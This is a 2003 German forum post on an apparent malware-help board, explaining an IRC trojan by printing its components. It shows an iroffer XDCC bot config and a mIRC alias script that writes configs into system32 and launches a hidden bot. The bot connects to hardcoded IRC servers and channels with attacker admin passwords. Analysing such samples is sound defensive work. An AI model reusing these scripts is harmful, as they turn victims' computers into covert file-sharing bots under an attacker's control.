IRC Trojaner

AUGUST · 16.03.2003, 16:24

Die Dateien habe ich noch ich schicke dir die Interesantessten mal rüber
Die Standardsachen wie den getarnten VNC clienten lasse ich dabei mal weg

hier noch ein kleiner auszug davon wie so nen script ausehen kann

Mybot2 Datei sieht so aus mit den dazugehörigen angaben zum channel und sen pass des angreifers so wie seinen usernamen

xdccfile mybot2.xdcc
pidfile mybot2.pid
logstats no
logrotate none
ignorefile mybot2.ignl
connectionmethod direct
server 213.77.3.205 6667
channel #XDCC-SHAKEL -plist 5
user_nick [Xdcc][a2]072727o
user_realname 8,14-=[Baa]=- Xdcc
user_modes +i
virthost no
vhost_ip virtip.domain.com
firewall no
dccrangestart 4000
loginname Loads2
slotsmax 5
queuesize 5
slotsmaxpack 5
slotsmaxslots 5
slotsmaxqueue 20
maxtransfersperperson 2
maxqueueditemsperperson 2
filedir /winnt/system32/download
restrictlist yes
restrictsend yes
overallminspeed
transfermaxspeed
overallmaxspeed 0
overallmaxspeeddayspeed 0
overallmaxspeeddaytime 0
overallmaxspeeddaydays MTWRF
debug no
autosend no
autoword blah
automsg blah
autopack 1
xdccautosavetime 30
creditline 1Brought To You By 4Loads1.
adminpass ROmazt.MMB89s
adminhost *@*
adminhost *@*
uploadallowed yes
uploaddir /WINNT/system32/download
uploadmaxsize 1900

Als nächstes das Aliasses script auch ganz interesannt

[aliases]
n0=CreateBot {
n1= //run $mircdir\kill.exe iroffer.exe
n2= /set %xdcc.nick [Wz][IB]xdcc $+ $rand(10,100000)
n3= /timer 1 2 /CreateBot2
n4=}
n5=CreateBot2 {
n6= /remove c:\winnt\system32\mybot.txt
n7= /write c:\winnt\system32\mybot.txt xdccfile mybot.xdcc
n8= /write c:\winnt\system32\mybot.txt pidfile mybot.pid
n9= /write c:\winnt\system32\mybot.txt logstats no
n10= /write c:\winnt\system32\mybot.txt logrotate none
n11= /write c:\winnt\system32\mybot.txt ignorefile mybot.ignl
n12= /write c:\winnt\system32\mybot.txt connectionmethod direct
n13= /write c:\winnt\system32\mybot.txt server 192.114.144.67 9898
n14= /write c:\winnt\system32\mybot.txt channel #warezone -plist 5
n15= /write c:\winnt\system32\mybot.txt channel #ICQ^BOY -plist 5
n16= /write c:\winnt\system32\mybot.txt user_nick %xdcc.nick
n17= /write c:\winnt\system32\mybot.txt user_realname 9,14-=[ICQ^BOY's]=- Xdcc
n18= /write c:\winnt\system32\mybot.txt user_modes +i
n19= /write c:\winnt\system32\mybot.txt virthost no
n20= /write c:\winnt\system32\mybot.txt vhost_ip virtip.domain.com
n21= /write c:\winnt\system32\mybot.txt firewall no
n22= /write c:\winnt\system32\mybot.txt dccrangestart 4000
n23= /write c:\winnt\system32\mybot.txt loginname W-M
n24= /write c:\winnt\system32\mybot.txt slotsmax 5
n25= /write c:\winnt\system32\mybot.txt queuesize 5
n26= /write c:\winnt\system32\mybot.txt slotsmaxpack 5
n27= /write c:\winnt\system32\mybot.txt slotsmaxslots 5
n28= /write c:\winnt\system32\mybot.txt slotsmaxqueue 20
n29= /write c:\winnt\system32\mybot.txt maxtransfersperperson 2
n30= /write c:\winnt\system32\mybot.txt maxqueueditemsperperson 2
n31= /write c:\winnt\system32\mybot.txt filedir /winnt/system32/download
n32= /write c:\winnt\system32\mybot.txt restrictlist yes
n33= /write c:\winnt\system32\mybot.txt restrictsend yes
n34= /write c:\winnt\system32\mybot.txt overallminspeed
n35= /write c:\winnt\system32\mybot.txt transfermaxspeed
n36= /write c:\winnt\system32\mybot.txt overallmaxspeed 0
n37= /write c:\winnt\system32\mybot.txt overallmaxspeeddayspeed 0
n38= /write c:\winnt\system32\mybot.txt overallmaxspeeddaytime 0
n39= /write c:\winnt\system32\mybot.txt overallmaxspeeddaydays MTWRF
n40= /write c:\winnt\system32\mybot.txt debug no
n41= /write c:\winnt\system32\mybot.txt autosend no
n42= /write c:\winnt\system32\mybot.txt autoword blah
n43= /write c:\winnt\system32\mybot.txt automsg blah
n44= /write c:\winnt\system32\mybot.txt autopack 1
n45= /write c:\winnt\system32\mybot.txt xdccautosavetime 30
n46= /write c:\winnt\system32\mybot.txt creditline 1Brought To You By 12ICQ^BOY1.
n47= /write c:\winnt\system32\mybot.txt adminpass C20I8z76CaUCo
n48= /write c:\winnt\system32\mybot.txt adminhost ICQ^BOY*!*@*
n49= /write c:\winnt\system32\mybot.txt uploadallowed yes
n50= /write c:\winnt\system32\mybot.txt uploaddir /WINNT/system32/download
n51= /write c:\winnt\system32\mybot.txt uploadmaxsize 1900
n52= /timer 1 2 //run $mircdir\iroffer.exe mybot.txt
n53=}
n54=CreateBota {
n55= //run $mircdir\kill.exe iroffer.exe
n56= /set %xdcc.nick2 [Wz][IB]xdcc $+ $rand(10,100000)
n57= /timer 1 2 /CreateBota2
n58=}
n59=CreateBota2 {
n60= /remove c:\winnt\system32\mybot2.txt
n61= /write c:\winnt\system32\mybot2.txt xdccfile mybot2.xdcc
n62= /write c:\winnt\system32\mybot2.txt pidfile mybot2.pid
n63= /write c:\winnt\system32\mybot2.txt logstats no
n64= /write c:\winnt\system32\mybot2.txt logrotate none
n65= /write c:\winnt\system32\mybot2.txt ignorefile mybot2.ignl
n66= /write c:\winnt\system32\mybot2.txt connectionmethod direct
n67= /write c:\winnt\system32\mybot2.txt server mission.irc.co.il 6667
n68= /write c:\winnt\system32\mybot2.txt channel #ICQ^BOY -plist 5
n69= /write c:\winnt\system32\mybot2.txt channel #Warezone -plist 5
n70= /write c:\winnt\system32\mybot2.txt user_nick %xdcc.nick2
n71= /write c:\winnt\system32\mybot2.txt user_realname 9,14-=[ICQ^BOY's]=- Xdcc
n72= /write c:\winnt\system32\mybot2.txt user_modes +i
n73= /write c:\winnt\system32\mybot2.txt virthost no
n74= /write c:\winnt\system32\mybot2.txt vhost_ip virtip.domain.com
n75= /write c:\winnt\system32\mybot2.txt firewall no
n76= /write c:\winnt\system32\mybot2.txt dccrangestart 4000
n77= /write c:\winnt\system32\mybot2.txt loginname w-m
n78= /write c:\winnt\system32\mybot2.txt slotsmax 5
n79= /write c:\winnt\system32\mybot2.txt queuesize 5
n80= /write c:\winnt\system32\mybot2.txt slotsmaxpack 5
n81= /write c:\winnt\system32\mybot2.txt slotsmaxslots 5
n82= /write c:\winnt\system32\mybot2.txt slotsmaxqueue 20
n83= /write c:\winnt\system32\mybot2.txt maxtransfersperperson 2
n84= /write c:\winnt\system32\mybot2.txt maxqueueditemsperperson 2
n85= /write c:\winnt\system32\mybot2.txt filedir /winnt/system32/download
n86= /write c:\winnt\system32\mybot2.txt restrictlist yes
n87= /write c:\winnt\system32\mybot2.txt restrictsend yes
n88= /write c:\winnt\system32\mybot2.txt overallminspeed
n89= /write c:\winnt\system32\mybot2.txt transfermaxspeed
n90= /write c:\winnt\system32\mybot2.txt overallmaxspeed 0
n91= /write c:\winnt\system32\mybot2.txt overallmaxspeeddayspeed 0
n92= /write c:\winnt\system32\mybot2.txt overallmaxspeeddaytime 0
n93= /write c:\winnt\system32\mybot2.txt overallmaxspeeddaydays MTWRF
n94= /write c:\winnt\system32\mybot2.txt debug no
n95= /write c:\winnt\system32\mybot2.txt autosend no
n96= /write c:\winnt\system32\mybot2.txt autoword blah
n97= /write c:\winnt\system32\mybot2.txt automsg blah
n98= /write c:\winnt\system32\mybot2.txt autopack 1
n99= /write c:\winnt\system32\mybot2.txt xdccautosavetime 30
n100= /write c:\winnt\system32\mybot2.txt creditline 1Brought To You By 12ICQ^BOY's1.
n101= /write c:\winnt\system32\mybot2.txt adminpass C20I8z76CaUCo
n102= /write c:\winnt\system32\mybot2.txt adminhost ICQ^BOY*!*@*
n103= /write c:\winnt\system32\mybot2.txt uploadallowed yes
n104= /write c:\winnt\system32\mybot2.txt uploaddir /WINNT/system32/download
n105= /write c:\winnt\system32\mybot2.txt uploadmaxsize 1900
n106= /timer 1 2 //run $mircdir\iroffer.exe mybot2.txt
n107=}

hoffe ein wenig einblich darüber gegeben zu haben was sich hinter solch einen trojaner verbirgt es sind da noch sehr viele dateien vorhanden die dazugehören allerdings würde es den rahmen des Boards Sprengen alle hier aufzulisten

Mfg. AUGUST

IRC Trojaner

Plagegeister aller Art und deren Bekämpfung: IRC Trojaner

IRC Trojaner